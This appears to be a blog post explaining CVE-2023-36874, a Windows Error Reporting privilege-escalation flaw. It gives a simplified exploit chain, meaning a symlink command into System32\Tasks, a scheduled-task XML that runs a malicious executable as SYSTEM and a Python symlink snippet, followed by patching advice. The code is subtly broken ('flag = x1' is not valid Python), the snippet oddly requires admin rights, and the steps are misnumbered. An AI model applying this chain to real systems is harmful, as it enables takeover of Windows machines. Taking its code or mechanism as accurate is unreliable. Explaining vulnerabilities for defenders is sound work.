CVE-2023-36874 - How an Attacker Could Use Windows Error Reporting Service to Gain System Privileges

---

Introduction

A dangerous vulnerability—CVE-2023-36874—was discovered in Microsoft Windows affecting the Error Reporting Service (WER). If you manage or use Windows systems, this bug gives attackers a way to get *system-level* permissions: that’s as high as you can go, usually reserved only for Windows itself. This post walks you through what the bug is, how it works, links to references, exploit details (with proof-of-concept code), and tips for mitigation. The goal is to keep things simple and direct.

What is CVE-2023-36874?

CVE-2023-36874 is an *Elevation of Privilege* vulnerability in the Windows Error Reporting Service (often seen as WerFault.exe). WER is the tool that pops up when a program “crashes” and asks for a crash report to be sent to Microsoft. The flaw was discovered by security researchers at *Kaspersky* and recognized as being exploited in the wild, used as a zero-day during cyberattacks.

When exploited, a local attacker (one who already has basic access to your PC) can use this flaw to run their own code as SYSTEM, the most privileged user. This allows bypassing security measures, disabling antivirus, or installing malware that’s nearly impossible to remove.

Technical Details: How Does the Exploit Work?

*Windows Error Reporting* uses temporary folders and files to process crash dumps (.dmp files) on every crash. The problem was an *improper security control for these folders and files*. Specifically, WER could be tricked into loading or overwriting files in places an attacker picks. Crafty attackers use *symbolic links* (like a shortcut that redirects file access elsewhere) to redirect WER to overwrite, or place, files in protected locations.

Here’s what typically happens

1. Attacker creates a symbolic link to trick WER into writing to a folder they pick (e.g., Windows Tasks or System32).

Trigger a crash (cause an application to crash so WER runs).

3. WER runs as SYSTEM when processing and, thanks to the symlink, writes files where the attacker wants, even if they need admin rights.
4. Attacker gains SYSTEM privileges by controlling what gets loaded/executed.

Exploit Scenario

Let’s walk through a simplified exploitation chain.

1. Create a Symbolic Link

Abuse the Window’s symbolic link tool, mklink, or use code.

# Create a symlink from a temp WER folder to a SYSTEM folder
cmd.exe /c mklink /D C:\Users\Public\AppData\Local\Temp\WERABC123 C:\Windows\System32\Tasks

2. Prepare a Malicious File

Create a file (e.g., a scheduled task XML) which will run your malware with SYSTEM privileges.

<!-- Example malicious scheduled task XML -->
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">;
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
      <UserId>S-1-5-18</UserId><!-- SYSTEM SID -->
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\malicious.exe</Command>
    </Exec>
  </Actions>
</Task>

3. Crash a Program to Trigger WER

You can purposely crash a small app (for example, a small C program with a division by zero).

4. WER Processes the Crash

WER attempts to store error data in its temp folder (which is now a link to System32\Tasks). It leaves the attacker’s malicious XML file in a privileged location.

5. Malicious Task Executes as SYSTEM

Upon next user logon or system boot, Windows picks up the new scheduled task and runs malicious.exe as SYSTEM, giving the attacker full control.

Below is an illustrative Python snippet showing folder symlink creation on Windows (requires admin)

import os
import ctypes

def create_symlink(src, dst):
    # SYMBOLIC_LINK_FLAG_DIRECTORY = x1
    flag = x1
    ctypes.windll.kernel32.CreateSymbolicLinkW(dst, src, flag)

src = r"C:\Windows\System32\Tasks"
dst = r"C:\Users\Public\AppData\Local\Temp\WERABC123"
create_symlink(src, dst)
print(f"Symlink created: {dst} -> {src}")

*Note: Actual exploitation needs precise timing and extra steps but this shows how attackers redirect WER’s file access into SYSTEM territory.*

References & Further Reading

- Microsoft Security Advisory
- Kaspersky Analysis
- Google Project Zero Report
- CVE Details

Mitigation: How to Protect Yourself

- Update Windows: The only true fix is to install Microsoft’s July 2023 security updates or later.

Least Privilege: Restrict access for regular users wherever possible.

- Monitor System Folders & Logs: Especially for unexpected files in System32\Tasks or Windows\System32.

Conclusion

CVE-2023-36874 is a classic example of why you should never skip patching your systems—Windows’s own built-in error handler could have made you a victim. Attackers used simple filesystem tricks to go from user to SYSTEM, and all it took was a little mismanagement of folder permissions. The good news: Microsoft fixed it, so updating your machines is your best defense.

Stay alert, patch early, and you’ll be a much harder target for attackers exploiting bugs like CVE-2023-36874.

Timeline

Published on: 07/11/2023 18:15:00 UTC
Last modified on: 07/12/2023 12:46:00 UTC